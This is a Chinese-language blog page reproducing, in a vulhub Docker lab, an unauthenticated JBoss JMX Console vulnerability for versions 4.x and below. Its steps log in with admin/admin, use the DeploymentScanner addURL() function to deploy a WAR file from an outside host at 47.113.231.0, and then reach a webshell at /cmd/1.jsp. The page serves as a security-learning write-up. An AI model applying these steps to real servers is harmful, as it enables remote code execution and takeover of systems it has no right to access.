当前位置: 首页 > news >正文

Jboss 低版本JMX Console未授权

news 2024/9/22 18:54:36

漏洞描述

此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到 jmx控制台,并在其中执⾏任何功能

影响范围

Jboss4.x以下

环境搭建

cd vulhub-master/jboss/CVE-2017-7504

docker-compose up -d

漏洞复现

1.访问

http://192.168.0.100:8080/jmx-console/

2.这⾥我们使⽤得复现环境不存在,所以需要密码(正常环境⽆需密码直接可进⼊)

admin admin

3.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)

4.找到⻚⾯中的void addURL() 选项远程加载war包来部署。

5.制作war包 填写war包远程地址

http://47.113.231.0/cmd.war

6.webshell连接

http://192.168.0.100:8080/cmd/1.jsp


http://www.mrgr.cn/news/33530.html

相关文章:

  • Spring框架总体结构
  • Arthas heapdump(dump java heap, 类似 jmap 命令的 heap dump 功能)
  • Windows 配置docker和ubuntu系统
  • C++ boost——时间与日期
  • 揭秘提升工作效率的五大编程工具秘籍
  • 植物大战僵尸【源代码分享+核心思路讲解】
  • 策略模式在 Spring Boot 框架中的应用
  • 蜗牛兼职网设计与Spring Boot应用
  • 轻掺杂漏极(LDD)技术
  • 使用image watch查看图片像素值
  • KamaCoder 103. 水流问题
  • 【MySQL】库的操作
  • 联合体的用法和用联合体判断大小端存储
  • 【排序算法】插入排序_直接插入排序、希尔排序
  • c# 三元表达式
  • 开源 AI 智能名片 S2B2C 商城小程序与营销工具的快速迭代
  • priority_queue 与 deque
  • 如果一个线上运行的程序,出现了死锁,应该怎么处理
  • 【记录】Excel|不允许的操作:合并或隐藏单元格出现的问题列表及解决方案
  • Elasticsearch导出导入数据